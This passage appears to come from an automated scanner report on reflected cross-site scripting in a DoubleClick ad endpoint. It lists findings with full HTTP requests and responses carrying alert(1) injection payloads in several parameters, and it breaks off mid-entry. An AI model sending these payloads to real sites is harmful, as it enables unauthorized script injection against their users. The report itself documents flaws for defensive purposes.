Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0f68b2'-alert(1)-'701c5fe0be3&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.co
...[SNIP]...

3.405. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f707'-alert(1)-'33559d16e43 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3f707'-alert(1)-'33559d16e43&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Ess
...[SNIP]...
dlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3f707'-alert(1)-'33559d16e43&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405574/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=61212128
...[SNIP]...

3.406. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9850e"-alert(1)-"d2b4ef7b6c9 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=9850e"-alert(1)-"d2b4ef7b6c9&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Ess
...[SNIP]...
dlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=9850e"-alert(1)-"d2b4ef7b6c9&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongecell.com/
...[SNIP]...

3.407. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6662c'-alert(1)-'85eaa813731 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6662c'-alert(1)-'85eaa813731&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
m.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6662c'-alert(1)-'85eaa813731&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405518/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=6
...[SNIP]...

3.408. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd040"-alert(1)-"8854e35d8ef was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=dd040"-alert(1)-"8854e35d8ef&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Ess
...[SNIP]...
m.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=dd040"-alert(1)-"8854e35d8ef&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongece
...[SNIP]...

3.409. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcb63'-alert(1)-'dbfa3066ef4 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bcb63'-alert(1)-'dbfa3066ef4&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Ess
...[SNIP]...
3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=bcb63'-alert(1)-'dbfa3066ef4&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/plac
...[SNIP]...

3.410. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e49"-alert(1)-"5c56edf5f04 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=f8e49"-alert(1)-"5c56edf5f04&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/z%3B240046691%3B5-0%3B0%3B61212128%3B4307-300/250%3B41645541/41663328/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=f8e49"-alert(1)-"5c56edf5f04&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
place
...[SNIP]...

3.411. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3d9'-alert(1)-'b66310e94c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=bf3d9'-alert(1)-'b66310e94c&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2064

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=bf3d9'-alert(1)-'b66310e94c&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405590/clickthrough?noflash=true&noscript=true&si
...[SNIP]...

3.412. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12934"-alert(1)-"dee4c1d2568 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=12934"-alert(1)-"dee4c1d2568&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=12934"-alert(1)-"dee4c1d2568&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\
...[SNIP]...

3.413. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9db'-alert(1)-'ff3e3bf1da7 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=fb9db'-alert(1)-'ff3e3bf1da7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2064
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:40:43 GMT
Expires: Wed, 27 Apr 2011 23:40:43 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/147/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Ess
...[SNIP]...
404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=fb9db'-alert(1)-'ff3e3bf1da7http://spongecell.com/api/placements/46405574/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=61212128\" target=\"_blank\">
...[SNIP]...

3.414. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fe8"-alert(1)-"84989796090 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=47fe8"-alert(1)-"84989796090 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2064
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:40:39 GMT
Expires: Wed, 27 Apr 2011 23:40:39 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/147/%2a/z%3B240046691%3B5-0%3B0%3B61212128%3B4307-300/250%3B41645541/41663328/1%3B%3B%7Ess
...[SNIP]...
404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=47fe8"-alert(1)-"84989796090",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongecell.com/api/placements/46405556.js\" type=\"text/javascript\">
...[SNIP]...

3.415. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba10d"-alert(1)-"8bda0c8c53d was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

